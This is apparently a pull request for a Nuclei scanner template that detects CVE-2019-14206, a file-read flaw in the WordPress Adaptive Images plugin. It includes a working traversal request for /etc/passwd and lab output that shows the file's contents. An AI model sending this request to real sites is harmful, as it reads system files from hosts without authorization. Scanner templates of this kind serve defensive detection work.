### PR TITLE
add template: CVE-2019-14206 WordPress Adaptive Images

### DIFF
--- a/http/cves/2019/CVE-2019-14206.yaml
+++ b/http/cves/2019/CVE-2019-14206.yaml
@@ -14,7 +14,6 @@ info:
     - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
     - https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
     - https://nvd.nist.gov/vuln/detail/CVE-2019-14206
-    - https://wpscan.com/vulnerability/7beaa002-880e-4f94-9f6d-61a8497b9019
   classification:
     cve-id: CVE-2019-14206
     cwe-id: CWE-22
@@ -25,33 +24,18 @@ info:
     cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:*
   metadata:
     max-request: 1
-    vendor: nevma
-    product: adaptive_images
-    framework: wordpress
-    shodan-query: 'title:"WordPress" "Adaptive Images"'
-    fofa-query: 'body="adaptive-images-settings" && body="adaptive-images-script.php"'
     verified: true
-  tags: cve,cve2019,wordpress,wp-plugin,filedeletion,arbitrary-file-deletion,lfi,wp
+  tags: cve,cve2019,wordpress,wp-plugin,lfi,wp,adaptive-images
 
 http:
   - method: GET
     path:
       - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd"
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "root:x:0:0:root"
-          - "/bin"
+      - type: dsl
+        dsl:
+          - "regex('root:.*:0:0:', body)"
+          - 'contains(body, "adaptive-images")'
+          - "status_code == 200"
         condition: and
-
-      - type: word
-        part: header
-        words:
-          - image/jpeg
-
-      - type: status
-        status:
-          - 200


### PR DESCRIPTION
## Summary
Adds a template for CVE-2019-14206 in the Adaptive Images plugin (<0.6.67). The adaptive-images-script.php input is unsanitized, allowing arbitrary file read (LFI) and arbitrary file deletion via the cache path.

/claim #14693

## POC
GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=/etc/passwd

## Validation
- Environment: Docker lab (WordPress 6.5, PHP 8.1, Adaptive Images 0.6.65) in labs/wp-adaptive-filedeletion
- Command: `nuclei -t bounties/CVE-2019-14206.yaml -u http://127.0.0.1:8080 -debug`
- Output (excerpt):
  - HTTP/1.1 200 OK
  - Content-Type: image/jpeg
  - root:x:0:0:root:/root:/bin/bash
  - 3 matches found.

## References
- https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html
- https://github.com/markgruffer/markgruffer.github.io/blob/master/_posts/2019-07-19-adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.markdown
- https://nvd.nist.gov/vuln/detail/CVE-2019-14206
- https://wpscan.com/vulnerability/7beaa002-880e-4f94-9f6d-61a8497b9019